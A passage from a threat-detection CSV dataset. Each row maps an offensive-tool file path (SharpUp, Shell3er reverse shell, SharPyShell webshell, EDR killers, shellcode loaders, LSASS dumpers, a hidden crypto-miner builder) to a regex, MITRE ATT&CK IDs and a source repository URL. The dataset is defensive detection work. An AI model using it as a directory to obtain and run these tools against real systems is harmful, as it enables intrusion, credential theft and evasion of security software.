offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpSvc.exe*",".{0,1000}\\SharpSvc\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpTask.exe*",".{0,1000}\\SharpTask\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpTerminator.csproj*",".{0,1000}\\SharpTerminator\.csproj.{0,1000}","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/mertdas/SharpTerminator","1","0","N/A","N/A","3","289","59","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z" "*\SharpTokenFinder.exe*",".{0,1000}\\SharpTokenFinder\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpUp.csproj*",".{0,1000}\\SharpUp\.csproj.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. 
Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*\SharpUp.exe*",".{0,1000}\\SharpUp\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpUp.sln*",".{0,1000}\\SharpUp\.sln.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*\SharpUp\*",".{0,1000}\\SharpUp\\.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. 
no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*\SharpUp-master*",".{0,1000}\\SharpUp\-master.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*\SharpView.exe*",".{0,1000}\\SharpView\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpWebServer.exe*",".{0,1000}\\SharpWebServer\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpWifiGrabber.exe*",".{0,1000}\\SharpWifiGrabber\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpWMI.exe*",".{0,1000}\\SharpWMI\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharPyShell*",".{0,1000}\\SharPyShell.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*\SharpZeroLogon.exe*",".{0,1000}\\SharpZeroLogon\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\Shell3er.ps1*",".{0,1000}\\Shell3er\.ps1.{0,1000}","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/Shell3er","1","0","N/A","9","10","59","12","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z" "*\Shell3er-main*",".{0,1000}\\Shell3er\-main.{0,1000}","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/Shell3er","1","0","N/A","9","10","59","12","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z" "*\Shellcode Execution\CertEnumSystemStore\*",".{0,1000}\\Shellcode\sExecution\\CertEnumSystemStore\\.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","10","6","524","52","2024-04-05T14:21:15Z","2023-04-05T09:39:33Z" "*\Shellcode Execution\Enum*",".{0,1000}\\Shellcode\sExecution\\Enum.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 
- TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","10","6","524","52","2024-04-05T14:21:15Z","2023-04-05T09:39:33Z" "*\Shellcode Process Injector.csproj*",".{0,1000}\\Shellcode\sProcess\sInjector\.csproj.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*\shellcode.hpp*",".{0,1000}\\shellcode\.hpp.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*\shellcode_callback.exe*",".{0,1000}\\shellcode_callback\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\shellcode_createproc.xml*",".{0,1000}\\shellcode_createproc\.xml.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","10","1","N/A","N/A","N/A","N/A" 
"*\shellcode_loader.dll*",".{0,1000}\\shellcode_loader\.dll.{0,1000}","offensive_tool_keyword","GadgetToJScript","A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.","T1059.001 - T1078 - T1059.005","TA0002 - TA0004 - TA0001","N/A","N/A","Exploitation tools","https://github.com/med0x2e/GadgetToJScript","1","0","N/A","10","9","827","154","2021-07-26T17:35:40Z","2019-10-05T12:27:19Z" "*\shellcode_samples\*",".{0,1000}\\shellcode_samples\\.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*\shellcode-xor.py*",".{0,1000}\\shellcode\-xor\.py.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","10","7","N/A","N/A","N/A","N/A" "*\shelljack.c*",".{0,1000}\\shelljack\.c.{0,1000}","offensive_tool_keyword","Mara","Mara is a userland pty/tty sniffer","T1055 - T1106 - T1059","TA0002 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/io-tl/Mara/","1","0","N/A","9","1","50","6","2023-12-22T16:52:47Z","2022-08-02T13:02:41Z" "*\sherlock.exe*",".{0,1000}\\sherlock\.exe.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","184","39","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" 
"*\Shhhavoc.py*",".{0,1000}\\Shhhavoc\.py.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/icyguider/Shhhloader","1","0","N/A","9","10","1048","172","2024-04-26T14:24:52Z","2021-09-28T16:52:24Z" "*\Shhmon.*",".{0,1000}\\Shhmon\..{0,1000}","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense Evasion","https://github.com/matterpreter/Shhmon","1","1","N/A","N/A","3","216","36","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z" "*\Shhmon.exe*",".{0,1000}\\Shhmon\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\ShimDB\sdb-explorer*",".{0,1000}\\ShimDB\\sdb\-explorer.{0,1000}","offensive_tool_keyword","ShimDB","Shim database persistence (Fin7 TTP)","T1546.011","TA0003","N/A","N/A","Persistence","https://github.com/jackson5sec/ShimDB","1","1","N/A","9","1","35","10","2020-02-25T09:41:53Z","2018-06-21T00:38:10Z" "*\ShInject.exe*",".{0,1000}\\ShInject\.exe.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 
- T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*\Shoggoth.exe*",".{0,1000}\\Shoggoth\.exe.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","8","6","581","81","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z" "*\Shoggoth.pptx*",".{0,1000}\\Shoggoth\.pptx.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","8","6","581","81","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z" "*\Shoggoth.sln*",".{0,1000}\\Shoggoth\.sln.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","8","6","581","81","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z" "*\ShoggothEngine.cpp*",".{0,1000}\\ShoggothEngine\.cpp.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","8","6","581","81","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z" "*\SigFlip.exe*",".{0,1000}\\SigFlip\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","948","175","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "*\SigFlip.exe*",".{0,1000}\\SigFlip\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\SignToolEx.cpp*",".{0,1000}\\SignToolEx\.cpp.{0,1000}","offensive_tool_keyword","SignToolEx","Patching signtool.exe to 
accept expired certificates for code-signing","T1553.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/hackerhouse-opensource/SignToolEx","1","0","N/A","8","3","253","39","2023-12-29T15:08:41Z","2023-12-29T14:26:45Z" "*\SignToolEx.sln*",".{0,1000}\\SignToolEx\.sln.{0,1000}","offensive_tool_keyword","SignToolEx","Patching signtool.exe to accept expired certificates for code-signing","T1553.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/hackerhouse-opensource/SignToolEx","1","0","N/A","8","3","253","39","2023-12-29T15:08:41Z","2023-12-29T14:26:45Z" "*\SignToolExDll*",".{0,1000}\\SignToolExDll.{0,1000}","offensive_tool_keyword","SignToolEx","Patching signtool.exe to accept expired certificates for code-signing","T1553.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/hackerhouse-opensource/SignToolEx","1","0","N/A","8","3","253","39","2023-12-29T15:08:41Z","2023-12-29T14:26:45Z" "*\sigthief.exe*",".{0,1000}\\sigthief\.exe.{0,1000}","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. 
Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/threatexpress/metatwin","1","0","N/A","9","4","319","74","2022-05-18T18:32:51Z","2017-10-08T13:26:00Z" "*\Silent.7z*",".{0,1000}\\Silent\.7z.{0,1000}","offensive_tool_keyword","WDBypass","Disable Windows Defender (+ UAC Bypass, + Upgrade to SYSTEM)","T1089 - T1562.001 - T1548.002","TA0005 - TA0040 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://bitbucket.org/evilgreyswork/wd-uac/downloads/","1","0","https://blog.injectexp.dev/2024/02/28/disable-windows-defender-uac-bypass-upgrade-to-system/","10","10","N/A","N/A","N/A","N/A" "*\SilentClean.exe*",".{0,1000}\\SilentClean\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","0","N/A","10","10","175","28","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" "*\SilentCryptoMiner\*",".{0,1000}\\SilentCryptoMiner\\.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","0","N/A","9","10","1032","252","2024-04-11T01:25:28Z","2021-11-08T09:03:32Z" "*\SilentProcessExit.sln*",".{0,1000}\\SilentProcessExit\.sln.{0,1000}","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","0","N/A","10","5","430","61","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" "*\SillyRAT\*.py",".{0,1000}\\SillyRAT\\.{0,1000}\.py","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*\simple-backdoor.php*",".{0,1000}\\simple\-backdoor\.php.{0,1000}","offensive_tool_keyword","webshell","A collection of webshell","T1505.003 - T1100 - T1190 - T1505.004","TA0003 - TA0011 ","N/A","N/A","Persistence","https://github.com/Peaky-XD/webshell","1","0","N/A","10","1","48","11","2024-03-02T05:51:24Z","2024-02-28T15:12:42Z" "*\SimpleLoader.cpp*",".{0,1000}\\SimpleLoader\.cpp.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - 
TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*\SimpleLoader.exe*",".{0,1000}\\SimpleLoader\.exe.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*\simpleXORencoder.c*",".{0,1000}\\simpleXORencoder\.c.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*\SingleDose.csproj*",".{0,1000}\\SingleDose\.csproj.{0,1000}","offensive_tool_keyword","SingleDose","SingleDose is a framework to build shellcode load/process injection techniques","T1055 - T1185","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Wra7h/SingleDose","1","0","N/A","10","2","151","27","2023-05-15T19:46:43Z","2021-08-28T05:04:50Z" "*\SingleDose.exe*",".{0,1000}\\SingleDose\.exe.{0,1000}","offensive_tool_keyword","SingleDose","SingleDose is a framework to build shellcode load/process injection techniques","T1055 - T1185","TA0005 - TA0003","N/A","N/A","Defense 